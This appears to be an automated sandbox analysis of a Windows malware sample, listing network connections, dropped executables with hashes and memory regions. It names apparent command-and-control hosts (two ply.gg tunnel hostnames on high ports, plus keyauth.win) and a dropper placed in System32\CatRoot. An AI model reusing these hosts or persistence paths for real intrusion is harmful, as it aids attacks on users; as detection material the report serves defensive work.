C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 80.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 57.72.67.172.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
N/A 127.0.0.1:58070 tcp
N/A 127.0.0.1:58072 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
N/A 127.0.0.1:58138 tcp
N/A 127.0.0.1:58140 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 62.179.17.96.in-addr.arpa udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 d4b5b842a71842fbfb3ea14e4752994a
SHA1 58c532183fdbf32d2e8f8ffaf02479ab0ccfb648
SHA256 501b93b3da9435d5061e0e206b642feb767a6f181f964873ffdcd72c17091ce2
SHA512 900b0f15db2ac3410eaaa44b52e8e9abe963cd0b202cdbed5898438a111eca52219458e3fc827274a6ad2c317bbd7678e3b33fab99de64c4f98beee462a679d2

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 cb7c1e1ce6e5917ad52dd699772002bb
SHA1 bc05624df83cced4ed945ac3182ac97049bc7586
SHA256 b7d1dbc8e0b381bf95928464a039b96187fbb1401dcf1ec9de5dc4cba615b7a7
SHA512 9f827425bf85a29d787e456931ae6bd0161432902b3748b4dd7237924838f888fba83853e9e0d0daf3c4ee1cbc78fab8634c375a7722f057f15a4ddc12ed4ee8

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 4e25df8616a51277577cbca1ac024c7d
SHA1 363f6f7d76493f8e2db60c462c8ec8f1b270dc6b
SHA256 56c4cc17a8d5314fab836914c0795c143e72aa804dbe3c831d2a50d74b4ec920
SHA512 6da3eae6f206d572e58605d0716eb992bdc6f35954cc00f629f34b1ead3c965071a0c63ba971d8a8269e208d9792acfa1fdb9e408ac6116a3f029afba6dfc3e1

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 c43c6b0bd656e1ba60690995939b9f75
SHA1 c101e9ba0e487c22833307f22aeaf03fab091e2f
SHA256 cc2493b30cbc923f27363a1fe64f1b86ccb7640dbe052b78afc09999522cac0b
SHA512 fa6a563e3dc92efba52466d45bd38f7485022d9ff13718cf8df7fb911bea81d2e1fd699edad8dda0ada87b03e7ce1e3d5d1f04c4ccc894d6c4c49455b791d3ed

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 0231ebffd43377d7d73ea910d668fd9f
SHA1 47c29cf6cfbd76af125fa2ed6001bd748066ced0
SHA256 ddc3a29559988736a1279b03e28ae505feeb97c45382d21365ee18fb35b6c382
SHA512 f9a4043beac571ad7155442cc669b7c99978909116e73efc91e75be62b9dbd66c23899d3658df4c48ad3742edaffcb77af43de7b1110126b2f942d0d787e8352

memory/1240-19-0x0000000000670000-0x0000000000CB0000-memory.dmp

memory/1240-21-0x0000000073660000-0x0000000073E10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 acb22b3d1c086716a323f11a60545b4a
SHA1 22319f4714f46724599ae23908cf5b740cd215b9
SHA256 dc182e06eca44bd2a8c411261ebfb02e1f52a8d3fec65b04f7dbd45b3e7e5cf0
SHA512 60a6eb955d08169be41cc189d2a9ba755d3d16d35e05fdb7242565a416e8c450259cca9e888003cd141c34b8571387753535354dac9a3583b7d1d51146e5fa16

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 4dcca46d90e94ee61f2e4f91630c4c5b
SHA1 47da5bc5b96897569d939a3307f6b7d0547638ba
SHA256 412de232d1b7004172028a8b636b90b9e3930c87b8e59e6e2a7036394d30df29
SHA512 ce7ecf3686f092d348c07d2a7d62fbca16b92bba45a873f001228741e32915287e878f6683abe89f7649d80bfb999afdbe564ab5c9ec2707e13e38b00b3467fd

memory/4624-39-0x00007FF605E10000-0x00007FF60624C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 0f0838bc6642dd6bc603368e50b4aba3
SHA1 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA256 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512 a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 b49500d5202af4a3257cf8c4575400ad
SHA1 ab3d5866bcb1b414a24794a12aa990c52f0af358
SHA256 0dffc6060d73e4a0bf0fd4e00bcfefeeb2c1c2e7d59e75f1d8d6eba363270adf
SHA512 bb233afc2c2074318a393bc9047798e4453dd776b741be2639f0b5a9e3caeb30ade2ffe844e688ea024ec95f05a7beb13e0030b1e28f35b8bd32769d5e2dfecb

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 7c286c763b22da89a4b329e3a8edb5f8
SHA1 6e248c7492dddf492f320ab97ba24cf8635991f1
SHA256 553c1c192299b440b79b01879f4ee0445f3ec172dd63bbed004ae12fb21cc1b6
SHA512 f78773d9a87ac88305ab518e76ac74d948ade03184ba816ce85125efbf346e694da28ea985a4b8fa52c2bb445f8675e2e7ece1bf0789d573b5528e8a41c0257e

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 4eeec1feb547ee82c53b254fc8f235bb
SHA1 c36c439b3583f59adff7835aa0589d32305ba482
SHA256 77f82cdea54ec261f67a62fd4058715adf4815cb5ab1e9ce7dded45b62e1ae35
SHA512 15ab1a5ea145347650ce66f20db16638fbb39a85921c9415fddcb43e7b366441585d36d2f0edca8b95c311527dd2d95425400cd236d86b78d1f160191c716c50

memory/992-41-0x00000000000D0000-0x0000000000152000-memory.dmp

memory/992-42-0x00000000049B0000-0x0000000004A4C000-memory.dmp

memory/992-45-0x0000000004C80000-0x0000000004C90000-memory.dmp

memory/992-46-0x0000000006650000-0x0000000006BF4000-memory.dmp

memory/992-44-0x0000000004A50000-0x0000000004AE2000-memory.dmp

memory/992-43-0x0000000073660000-0x0000000073E10000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2vvhbn10\2vvhbn10.cmdline

MD5 daba48829048f457e40bc9812a12a720
SHA1 d65d9f14cad062f82ca907568b4172d5b71097b7
SHA256 716a398bbdbac39a222a887985a23383b15a0ec76b21a87ad0039c3021b0683a
SHA512 5af619e2fb0fcc54363580359f2c6e237a50c59fcf38d3811a0530c68c36792a4ac6ed5212bd47474d995347a481ab1837a53b13551f211126e15b318f7897c4

\??\c:\Users\Admin\AppData\Local\Temp\2vvhbn10\2vvhbn10.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

memory/844-59-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RES5488.tmp

MD5 bc04e8e885be564ab443c2a36f02effc
SHA1 a047dd2c5829f6edcf7d8df95276448441d5978c
SHA256 676760d00c7024bb247b3f96edf40a9fa7fa21ce8c3eeef1ed35264e61d81703
SHA512 5a8462de3c5fef76852f6320507e2f84e9633e8925f9d971da6b0c4deb2700d066a21b2500742ba6749fe72dc067590ffd37e2378abfe1143d53874b14abd5a7

memory/844-60-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/844-61-0x0000000005230000-0x0000000005240000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC6FB58647E86F4633B75AC84240E5CCD1.TMP

MD5 1d5543c367c49b9dd6366270fdd4ee3a
SHA1 bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66
SHA256 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2
SHA512 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

MD5 f741e15c63bb0e3ec458d27216db8e9f
SHA1 5b18ac4f8c5fa8501a285bcf3afa6d648da591a7
SHA256 60a1c0c015c71c049e72dddd000a8ac4931eb97b0dc52d3beee62d8426b398a0
SHA512 40da2b64b21d0f40e219931a8d4a0bb8742d59bca14c516f6703a0e78e9ad70f6821dc0ce5c959a7fefa71e3408413c697528d420e65d000fbb8194b868a8a79

memory/3400-65-0x00000000002D0000-0x00000000002D8000-memory.dmp

memory/3944-66-0x0000000004830000-0x0000000004866000-memory.dmp

memory/3400-67-0x00007FFB2E7B0000-0x00007FFB2F271000-memory.dmp

memory/3944-68-0x0000000004950000-0x0000000004960000-memory.dmp

memory/3944-69-0x0000000004F90000-0x00000000055B8000-memory.dmp

memory/3944-73-0x0000000004950000-0x0000000004960000-memory.dmp

memory/3944-71-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/992-72-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/3944-74-0x0000000004EA0000-0x0000000004EC2000-memory.dmp

memory/3944-76-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/3944-78-0x0000000005850000-0x00000000058B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_otnet2mm.2lr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2172-79-0x00000000046A0000-0x00000000046B0000-memory.dmp

memory/3944-89-0x00000000058C0000-0x0000000005C14000-memory.dmp

memory/1240-90-0x0000000005780000-0x0000000005790000-memory.dmp

memory/2172-77-0x00000000046A0000-0x00000000046B0000-memory.dmp

memory/2172-75-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/1240-91-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/1240-101-0x00000000055F0000-0x0000000005612000-memory.dmp

memory/3944-102-0x0000000005E80000-0x0000000005E9E000-memory.dmp

memory/3944-103-0x0000000005F40000-0x0000000005F8C000-memory.dmp

memory/1240-110-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/3944-111-0x0000000006E20000-0x0000000006E52000-memory.dmp

memory/3944-112-0x000000007FAC0000-0x000000007FAD0000-memory.dmp

memory/4624-114-0x00007FF605E10000-0x00007FF60624C000-memory.dmp

memory/3944-113-0x000000006FEE0000-0x000000006FF2C000-memory.dmp

memory/3944-126-0x0000000007120000-0x00000000071C3000-memory.dmp

memory/3944-125-0x0000000004950000-0x0000000004960000-memory.dmp

memory/3944-127-0x0000000004950000-0x0000000004960000-memory.dmp

memory/3944-124-0x0000000006E00000-0x0000000006E1E000-memory.dmp

memory/2172-129-0x000000006FEE0000-0x000000006FF2C000-memory.dmp

memory/844-128-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/2172-139-0x00000000046A0000-0x00000000046B0000-memory.dmp

memory/3944-140-0x0000000007850000-0x0000000007ECA000-memory.dmp

memory/3944-141-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp68CC.tmp.bat

MD5 ec51455fda86d75d891b548e949db65b
SHA1 fa5692b18d3e94ab9e2d11f266547f3c8d3ebeac
SHA256 a21d420d17148532fe9fb326a632e9605f6b47ee93d98985d07b46ba242b5d0b
SHA512 61d971428729acc9e853451b4ef410b190c2c911c7f3a399b5451b8fde8a759c24fbb74ee911dd38a532d4543854d68ec43463e6da4ffec3645d01f003aa1529

memory/3944-143-0x0000000007230000-0x000000000723A000-memory.dmp

memory/3944-144-0x0000000007420000-0x00000000074B6000-memory.dmp

memory/2172-145-0x0000000007020000-0x0000000007031000-memory.dmp

memory/3944-146-0x00000000073E0000-0x00000000073EE000-memory.dmp

memory/2172-147-0x0000000007060000-0x0000000007074000-memory.dmp

memory/2172-148-0x0000000007150000-0x000000000716A000-memory.dmp

memory/2172-149-0x0000000007140000-0x0000000007148000-memory.dmp

memory/2172-152-0x0000000073660000-0x0000000073E10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 921ec71d0e8fa4ceb3b894032ae7d787
SHA1 35190a3d6716395a133ef21da414e49450e268e8
SHA256 f8905ee21421d72cd4a45a64694bd716f3639af1d8d806a9db18d441d0545a66
SHA512 ba8e6b46f300c488c5756dc38af93f0caf17fca1a012c4695b0e7810ef6786d5326f0bb12c52f97d0c80e4aaa6884c0ec98f83d548d670af4bc4421f8e319354

memory/3944-156-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/4280-158-0x0000000002630000-0x0000000002631000-memory.dmp

memory/2560-164-0x0000028CCDC20000-0x0000028CCDC40000-memory.dmp

memory/2560-168-0x0000028CCDFF0000-0x0000028CCE010000-memory.dmp

memory/2560-166-0x0000028CCD9E0000-0x0000028CCDA00000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 a90eacae53326f8f158592f7c5640113
SHA1 e01cf7007db6b3fc650aac5a1929cc51c7114466
SHA256 556e37760a7987ad2ddc367a01ced5f3febfccdcf7040c04aa139e5157aea15e
SHA512 6064814bf2f88de3442baefd48c43421926b4b60195788338be37a55324cf9f2a236cc334e276ac32ad66bb175afd1fd4f050a27c61559c9896ea258d6f944a6

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 a5dc894e40057b15a6ea19cdfb2081e6
SHA1 08693e0845f40cb2c70e3d122cb66e8d4d2d7568
SHA256 cdd986938f3474348b43c744277b213c6ea01b86636b70279d2fc5fa7faad1f0
SHA512 9747700a4cd43407bebc78f24f739fd8b5c057b214514c02e71ece17a2ab37d0f0eecf7a620cd38944f895deeee1a756a88aa8c2e5927b39ca5323bf21eab2bd

memory/3952-181-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/3400-182-0x00007FFB2E7B0000-0x00007FFB2F271000-memory.dmp

memory/2560-185-0x00000284CB000000-0x00000284CC92F000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133549113784399004.txt

MD5 c09e63e4b960a163934b3c29f3bd2cc9
SHA1 d3a43b35c14ae2e353a1a15c518ab2595f6a0399
SHA256 308deca5e1ef4d875fbe0aff3ce4b0b575b28e643dffda819d4390ec77faf157
SHA512 5ca3321034dff47e3afe0b0bdfaffc08782991660910a29375a8e0363794b78247282aba65dbd882ae225aa140ae63927dfd0946a441ee6fa64a1d8c146777b9

memory/3952-201-0x0000000005060000-0x0000000005070000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\QDDM1QX5\microsoft.windows[1].xml

MD5 2415f1b0b1e5150e9f1e871081fd1fad
SHA1 a79e4bfddc3daf75f059fda3547bd18282d993f7
SHA256 3eff25035403aba506d0dbf69c76a22fa90ec66d2094cbf39bc5267a850902ae
SHA512 5d05da9ec1471dbf91f0c474c8db3897130543ff3c4da70724ce3a36adc38f628264c3dae4f54caef493f7593a0986a944dda0e19e947f3dfc34fc16fbd3e6bb

memory/4564-209-0x000001DD877E0000-0x000001DD87800000-memory.dmp

memory/4564-211-0x000001DD877A0000-0x000001DD877C0000-memory.dmp

memory/4564-212-0x000001DD87BF0000-0x000001DD87C10000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

MD5 3f9c7ac5c5f341c9423480942c67500a
SHA1 62647104a246b91ad10f53ebacdb104b60d86293
SHA256 08cbd4166475d4c5052f8210b6bdb1a56df36e70545e29b5b4e7436a5676e059
SHA512 5d56f8dde71dcd473c7167463ad1f70ae2848497228d0c6ac84b2f7a2db706ca6629d5491eefbe664337137dc7158abdde11719506a3b9ade45fb2fafc035aca

C:\Windows\System32\CatRoot\$SXR\Read.txt

MD5 79668a6729f0f219835c62c9e43b7927
SHA1 0cbbc7cc8dbd27923b18285960640f3dad96d146
SHA256 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512 bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

memory/4564-226-0x000001DD850B0000-0x000001DD869DF000-memory.dmp

memory/4048-237-0x000002D12EA90000-0x000002D12EAB0000-memory.dmp

memory/4048-235-0x000002D12EAD0000-0x000002D12EAF0000-memory.dmp

memory/4048-241-0x000002D12EEA0000-0x000002D12EEC0000-memory.dmp

memory/4048-249-0x000002C92BE00000-0x000002C92D72F000-memory.dmp

memory/5028-257-0x000001D05C9B0000-0x000001D05C9D0000-memory.dmp

memory/5028-259-0x000001D05C970000-0x000001D05C990000-memory.dmp

memory/5028-263-0x000001D05CD80000-0x000001D05CDA0000-memory.dmp

memory/5028-271-0x000001C859C00000-0x000001C85B52F000-memory.dmp

memory/3304-279-0x000002445E670000-0x000002445E690000-memory.dmp

memory/3304-281-0x000002445E630000-0x000002445E650000-memory.dmp

memory/3304-284-0x000002445EA40000-0x000002445EA60000-memory.dmp

memory/3304-293-0x0000023C5BA30000-0x0000023C5D35F000-memory.dmp

memory/3952-294-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/3952-295-0x0000000005060000-0x0000000005070000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15

MD5 0e2a09c8b94747fa78ec836b5711c0c0
SHA1 92495421ad887f27f53784c470884802797025ad
SHA256 0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36
SHA512 61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel

MD5 fb5f8866e1f4c9c1c7f4d377934ff4b2
SHA1 d0a329e387fb7bcba205364938417a67dbb4118a
SHA256 1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170
SHA512 0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c